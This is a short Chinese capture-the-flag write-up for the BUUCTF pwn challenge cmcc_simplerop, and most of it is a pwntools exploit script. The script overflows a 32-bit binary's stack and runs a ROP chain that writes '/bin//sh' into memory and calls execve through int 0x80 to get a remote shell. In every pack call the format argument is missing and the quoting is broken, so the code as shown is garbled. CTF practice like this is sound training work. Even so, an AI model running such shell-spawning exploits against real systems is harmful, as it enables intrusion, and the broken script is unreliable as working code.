[BUUCTF-pwn]——cmcc_simplerop (ropchain)

[BUUCTF-pwn]——cmcc_simplerop

有栈溢出，自己找rop链，最简单的方法，让ROPgadget帮我们弄好呀，可是有点长，所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到，所有这之前的都不动， 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下，其他都可以进行修改 inc就是 ++

exploit

• 目的：使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx = 0; edx = 0

from pwn import *
from struct import pack

context(os='linux',arch='i386',log_level='debug')

#sh = process('./simplerop')
sh = remote("node3.buuoj.cn",28712)

strcmp_got = 0x080EA038
pop_eax = 0x080bae06
pop_edx_ecx_ebx = 0x0806e850
p = 'A' * 32

p += pack(', 0x0806e82a) # pop edx ; ret
p += pack(', 0x080ea060) # @ .data
p += pack(', 0x080bae06) # pop eax ; ret
p += '/bin'
p += pack(', 0x0809a15d) # mov dword ptr [edx], eax ; ret
p += pack(', 0x0806e82a) # pop edx ; ret
p += pack(', 0x080ea064) # @ .data + 4
p += pack(', 0x080bae06) # pop eax ; ret
p += '//sh'
p += pack(', 0x0809a15d) # mov dword ptr [edx], eax ; ret
p += pack(', 0x0806e850) # pop edx ecx ebx
p += p32(0) + p32(0)
p += pack(', 0x080ea060) # padding without overwrite ebx

p += pack(', 0x080bae06) # pop eax ; ret
p += p32(0xb)
p += pack(', 0x080493e1) # int 0x80


payload = p
sh.sendafter('Your input :',payload)
sh.interactive()